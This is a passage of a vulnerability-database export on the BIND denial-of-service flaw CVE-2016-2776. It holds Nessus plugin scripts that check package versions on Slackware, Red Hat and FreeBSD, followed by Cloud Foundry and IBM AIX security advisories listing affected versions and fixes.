script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", 
pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"bind\", pkgver:\"9.10.4_P3\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.10.4_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bind\", pkgver:\"9.10.4_P3\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.10.4_P3\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T05:38:16", "description": "An update for bind97 
is now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nSecurity Fix(es) :\n\n* A denial of service flaw was found in the way BIND constructed a\nresponse to a query that met certain criteria. A remote attacker could\nuse this flaw to make named exit unexpectedly with an assertion\nfailure via a specially crafted DNS request packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "RHEL 5 : bind97 (RHSA-2016:1945)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind97-chroot", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:bind97-libs", "p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind97", "p-cpe:/a:redhat:enterprise_linux:bind97-utils", "p-cpe:/a:redhat:enterprise_linux:bind97-devel"], "id": "REDHAT-RHSA-2016-1945.NASL", "href": "https://www.tenable.com/plugins/nessus/93785", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:1945. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93785);\n script_version(\"2.15\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"RHSA\", value:\"2016:1945\");\n\n script_name(english:\"RHEL 5 : bind97 (RHSA-2016:1945)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for bind97 is now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nSecurity Fix(es) :\n\n* A denial of service flaw was found in the way BIND constructed a\nresponse to a query that met certain criteria. A remote attacker could\nuse this flaw to make named exit unexpectedly with an assertion\nfailure via a specially crafted DNS request packet. 
(CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/article/AA-01419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:1945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-2776\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright 
(C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:1945\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", 
reference:\"bind97-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-debuginfo-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-debuginfo / bind97-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T10:58:08", "description": "ISC reports :\n\nTesting by ISC has uncovered a critical error condition which can\noccur when a nameserver is constructing a response. 
A defect in the\nrendering of messages into packets can cause named to exit with an\nassertion failure in buffer.c while constructing a response to a query\nthat meets certain criteria.", "edition": 33, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "FreeBSD : BIND -- Remote Denial of Service vulnerability (c8d902b1-8550-11e6-81e7-d050996490d0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:bind911", "p-cpe:/a:freebsd:freebsd:bind9-devel", "p-cpe:/a:freebsd:freebsd:bind99", "p-cpe:/a:freebsd:freebsd:bind910"], "id": "FREEBSD_PKG_C8D902B1855011E681E7D050996490D0.NASL", "href": "https://www.tenable.com/plugins/nessus/93781", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93781);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:28.bind\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"FreeBSD : BIND -- Remote Denial of Service vulnerability (c8d902b1-8550-11e6-81e7-d050996490d0)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC reports :\n\nTesting by ISC has uncovered a critical error condition which can\noccur 
when a nameserver is constructing a response. A defect in the\nrendering of messages into packets can cause named to exit with an\nassertion failure in buffer.c while constructing a response to a query\nthat meets certain criteria.\"\n );\n # https://kb.isc.org/article/AA-01419\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01419\"\n );\n # https://vuxml.freebsd.org/freebsd/c8d902b1-8550-11e6-81e7-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6cca01ef\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind9-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind910\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind911\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bind99<9.9.9P3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind910<9.10.4P3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind911<9.11.0.rc3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind9-devel<9.12.0.a.2016.09.10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:01", "bulletinFamily": "software", "cvelist": ["CVE-2016-2776"], "description": "USN-3088-1: Bind vulnerability\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS \n\n# Description\n\nIt was discovered that Bind incorrectly handled building responses to certain specially crafted requests. A remote attacker could possibly use this issue to cause Bind to crash, resulting in a denial of service.\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. 
\n_\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * All versions prior to 3151.5 \n * 3233.x versions prior to 3233.6 \n * 3263.x versions prior to 3263.12 \n * 3312.x versions prior to 3312.7 \n * All other versions \n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.85.0 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team recommends upgrading to the following BOSH stemcells: \n * Upgrade all lower versions of 3151.x to version 3151.5 \n * Upgrade all lower versions of 3233.x to version 3233.6 \n * Upgrade all lower versions of 3263.x to version 3263.12 \n * Upgrade all lower versions of 3312.x to version 3312.7 \n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.85.0 or later versions \n\n# References\n\n * <https://www.ubuntu.com/usn/usn-3088-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-2776.html>\n", "edition": 5, "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "id": "CFOUNDRY:DE630CF7E67472C9EFB46DD5E3E29439", "href": "https://www.cloudfoundry.org/blog/usn-3088-1/", "title": "USN-3088-1: Bind vulnerability | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "aix": [{"lastseen": "2020-04-22T00:52:07", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2775", "CVE-2016-2776"], "description": "\nIBM SECURITY ADVISORY\n\nFirst Issued: Fri Nov 18 08:19:36 CST 2016\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc\nhttps://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc\nftp://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc\n\n\nSecurity Bulletin: Vulnerabilities in BIND impact AIX (CVE-2016-2776 and\n CVE-2016-2775)\n\n\n===============================================================================\n\nSUMMARY:\n\n There are 
two vulnerabilities in BIND that impact AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2016-2776 \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776\n DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by an\n assertion failure in buffer.c while a nameserver is building responses\n to a specifically constructed request. By sending a specially crafted\n DNS packet, a remote attacker could exploit this vulnerability to make\n named exit unexpectedly with an assertion failure. \n CVSS Base Score: 7.5 \n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/117246 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n \n CVEID: CVE-2016-2775\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2775\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2775\n DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by an\n error when lwresd or the named lwres option is enabled. 
By sending\n an overly long request, a remote attacker could exploit this\n vulnerability to cause the daemon to crash.\n CVSS Base Score: 7.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/115477 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n \n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n key_fileset = aix\n\n Fileset Lower Level Upper Level KEY \n ---------------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs \n bos.net.tcp.server 5.3.12.0 5.3.12.6 key_w_fs\n bos.net.tcp.client 6.1.9.0 6.1.9.200 key_w_fs\n bos.net.tcp.server 6.1.9.0 6.1.9.200 key_w_fs\n bos.net.tcp.client 7.1.3.0 7.1.3.48 key_w_fs\n bos.net.tcp.server 7.1.3.0 7.1.3.48 key_w_fs\n bos.net.tcp.client 7.1.4.0 7.1.4.30 key_w_fs\n bos.net.tcp.server 7.1.4.0 7.1.4.30 key_w_fs\n bos.net.tcp.bind_utils 7.2.0.0 7.2.0.1 key_w_fs\n bos.net.tcp.bind 7.2.0.0 7.2.0.0 key_w_fs\n \n Note: To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client\n\n REMEDIATION:\n\n A. 
APARS\n \n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR Availability SP KEY\n ------------------------------------------------\n 5.3.12 IV90056 N/A N/A key_w_apar\n 6.1.9 IV89828 4/28/17 SP9 key_w_apar\n 7.1.3 IV89830 6/30/17 SP9 key_w_apar\n 7.1.4 IV89829 4/28/17 SP4 key_w_apar\n 7.2.0 IV89831 1/27/17 SP3 key_w_apar\n\n VIOS Level APAR Availability Release\n ------------------------------------------\n 2.2.3 IV89828 6/30/17 2.2.3.90\n 2.2.4 IV89828 6/30/17 2.2.4.40\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV90056\n http://www.ibm.com/support/docview.wss?uid=isg1IV89828\n http://www.ibm.com/support/docview.wss?uid=isg1IV89830\n http://www.ibm.com/support/docview.wss?uid=isg1IV89829\n http://www.ibm.com/support/docview.wss?uid=isg1IV89831\n\n https://www.ibm.com/support/docview.wss?uid=isg1IV90056\n https://www.ibm.com/support/docview.wss?uid=isg1IV89828\n https://www.ibm.com/support/docview.wss?uid=isg1IV89830\n https://www.ibm.com/support/docview.wss?uid=isg1IV89829\n https://www.ibm.com/support/docview.wss?uid=isg1IV89831\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available.\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/bind_fix13.tar\n http://aix.software.ibm.com/aix/efixes/security/bind_fix13.tar\n https://aix.software.ibm.com/aix/efixes/security/bind_fix13.tar\n\n The links above are to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. 
This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n AIX Level Interim Fix (*.Z) KEY\n ----------------------------------------------\n 5.3.12.9 IV90056m9a.161020.epkg.Z key_w_fix\n 6.1.9.5 IV89828m5a.161017.epkg.Z key_w_fix\n 6.1.9.6 IV89828m6a.161013.epkg.Z key_w_fix \n 6.1.9.7 IV89828m7a.161013.epkg.Z key_w_fix\n 7.1.3.5 IV89830m5a.161010.epkg.Z key_w_fix\n 7.1.3.6 IV89830m6d.161012.epkg.Z key_w_fix\n 7.1.3.7 IV89830m7a.161013.epkg.Z key_w_fix\n 7.1.4.0 IV89829m1a.161013.epkg.Z key_w_fix \n 7.1.4.1 IV89829m1a.161013.epkg.Z key_w_fix\n 7.1.4.2 IV89829m2a.161010.epkg.Z key_w_fix\n 7.2.0.0 IV89831m1a.161017.epkg.Z key_w_fix\n 7.2.0.1 IV89831m1a.161017.epkg.Z key_w_fix\n 7.2.0.2 IV89831m2a.161018.epkg.Z key_w_fix\n\n Please note that the above table refers to AIX TL/SP level as\n opposed to fileset level, i.e., 7.1.3.5 is AIX 